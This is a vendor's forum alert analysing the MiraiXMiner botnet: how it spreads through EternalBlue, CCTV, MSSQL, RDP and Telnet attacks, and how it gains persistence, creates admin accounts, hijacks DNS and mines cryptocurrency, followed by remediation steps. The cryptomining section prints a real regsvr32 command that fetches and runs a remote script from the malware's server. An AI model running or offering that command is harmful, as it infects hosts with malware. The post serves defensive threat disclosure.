Alert: MiraiXMiner IoT Botnet Featuring Multiple Virus Families!
  

Sangfor Elsa Lv2Posted 05 Dec 2018 17:06

Last edited by Sangfor Elsa 05 Dec 2018 17:10.

The Sangfor Security team has recently discovered a new IoT botnet with unique features found in several different virus families including Mirai, Mykings and Dark Cloud Trojan. Sangfor has named this new botnet MiraiXMiner and by tracking and monitoring it’s progress have discovered that it spreads through EternalBlue and vulnerabilities in CCTV IoT-capable devices, MS SQL, RDP Brute-force and Telnet brute-force attacks.

1. Attack Procedures
1. Virus vector msinfo.exe performs persistent attacks through service registration and malicious code injection.
2. C&C command is performed to download arbitrary attack module. MiraiXMiner downloads csrs.exe.
3. Privileged admin user account is added.
4. 3 submodules are downloaded: backdoor, DNS hijacking and cleanup (backdoor module up.rar is a well-known Dark Cloud BootKit).
5. u.exe hijacks DNS by altering DNS configuration files.
6. Cleanup module upsnew2.exe performs multiple roles including disabling the virus, adding auto boot items and stopping Windows Update service, to manipulate hosts in the long-term while continuing to download and perform mining operations.
7. Uses scanner and Mirai attack database to initiate large-scale attack on the internal network.
8. The function vector msinfo.exe connects to the cloud to auto-update the virus and the latest attack module.

1.png


2. Propagation Module

2.png

Scan on port 445, as shown below:

3.png

Perform scanning operations via internal MASSCAN program, as shown below:

4.png

Perform scanning operations via internal Nmap program, as shown below:

5.png

Attacks are launched against any vulnerable targets discovered.
The following shows an EternalBlue attack CrackerMS17010 in progress:

6.png

Attacks are launched by exploiting the CrackerCCTV vulnerability in CCTV IoT-capable devices, as shown below:

7.png

Attacks are launched by leveraging the CrackerMSSQL vulnerability in MSSQL, as shown below:

8.png

Database commands are executed, as shown below:

9.png

Malicious code is written in database storage, as shown below:

10.png

CrackerRDP conducts an attack against RDP, as shown below:

11.png

CrackerTelnet conducts an attack against Telnet, as shown below:

12.png

3. Creating Admin Account
The attacker downloads and decrypts the corresponding configuration file from a remote server, as shown below:

13.png

The downloaded config file is decrypted as an XML file to download and run the malicious program, as shown below:

14.png

The downloaded executable file CSRS is created with a python script. It is an exploit used for creating accounts, leveraging the vulnerability MS17010, as shown below:

15.png

An admin account is created on the host, as shown below:

16.png

An attacked is launched using the vulnerability MS17010, as shown below:

17.png

Attack parameters are as shown below:

18.png

4. Cryptomining and Dark Cloud Trojan

Download malicious program by starting regsvr32 /s /u /n /i:http://up.ms1128.site:8888\\s1.txt scrobj.dll, as shown below:


19.png

Decrypt the above XML script, as shown below:

20.png

Upsnew2 drops Dark Cloud Trojan item.dat and c3.bat script. The c3.bat script has the following functions:


Removes other viruses:


21.jpg

Enables MSSQLSERVER:
22.jpg

Alters registry and scheduled task settings to allow the virus to auto launch at host startup:

23.jpg

24.jpg

Disables auto update:

25.jpg

Loads the Dark Cloud Trojan:

26.jpg

Alters firewall configuration to disable ports (135, 137, 138, 139 and 445), preventing the host from being infected by other viruses.

27.jpg

5. Solution

1. Isolate the infected hosts, end all connections and disable network adapter.

2. Stop virus spread channel by disabling network sharing SMB port 445 and ending all suspicious outgoing connections. Sangfor NGAF customers should update the signature database to 20181204 and above as well as enable IPS and APT detection.

3. Remove the virus with Sangfor EDR tools which can be download here: http://go.sangfor.com/edr-tool-20181122

4. Fix the vulnerability by installing the patch ms17-010 from Microsoft for Eternal Blue




Like this topic? Like it or reward the author.

Creating a topic earns you 5 coins. A featured or excellent topic earns you more coins. What is Coin?

Enter your mobile phone number and company name for better service. Go

Trending Topics

Board Leaders